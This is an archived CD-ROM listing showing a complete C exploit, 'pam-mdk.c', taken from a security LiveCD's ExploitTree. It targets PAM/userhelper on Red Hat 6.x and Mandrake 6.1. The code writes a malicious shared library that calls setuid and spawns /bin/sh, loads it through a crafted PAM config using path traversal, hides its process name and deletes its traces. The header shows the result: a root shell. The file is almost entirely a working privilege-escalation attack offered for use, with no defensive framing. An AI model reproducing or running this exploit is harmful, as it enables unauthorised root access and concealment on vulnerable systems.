Chip 2007 January, February, March & April

home *** CD-ROM | disk | FTP | other *** search

/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / mandrake-pam.c < prev next >

Wrap

C/C++ Source or Header | 2005-02-12 | 1.5 KB | 56 lines

/* * pam-mdk.c (C) 2000 Paulo Ribeiro * * DESCRIPTION: * ----------- * Mandrake Linux 6.1 has the same problem as Red Hat Linux 6.x but its * exploit (pamslam.sh) doesn't work on it (at least on my machine). So, * I created this C program based on it which exploits PAM/userhelper * and gives you UID 0. * * SYSTEMS TESTED: * -------------- * Red Hat Linux 6.0, Red Hat Linux 6.1, Mandrake Linux 6.1. * * RESULTS: * ------- * [prrar@linux prrar]$ id * uid=501(prrar) gid=501(prrar) groups=501(prrar) * [prrar@linux prrar]$ gcc pam-mdk.c -o pam-mdk * [prrar@linux prrar]$ ./pam-mdk * sh-2.03# id * uid=0(root) gid=501(prrar) groups=501(prrar) * sh-2.03# */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> int main(int argc, char *argv[]) { FILE *fp; strcpy(argv[0], "vi test.txt"); fp = fopen("abc.c", "a"); fprintf(fp, "#include<stdlib.h>\n"); fprintf(fp, "#include<unistd.h>\n"); fprintf(fp, "#include<sys/types.h>\n"); fprintf(fp, "void _init(void) {\n"); fprintf(fp, "\tsetuid(geteuid());\n"); fprintf(fp, "\tsystem(\"/bin/sh\");\n"); fprintf(fp, "}"); fclose(fp); system("echo -e auth\trequired\t$PWD/abc.so > abc.conf"); system("chmod 755 abc.conf"); system("gcc -fPIC -o abc.o -c abc.c"); system("ld -shared -o abc.so abc.o"); system("chmod 755 abc.so"); system("/usr/sbin/userhelper -w ../../..$PWD/abc.conf"); system("rm -rf abc.*"); } /* pam-mdk.c: EOF */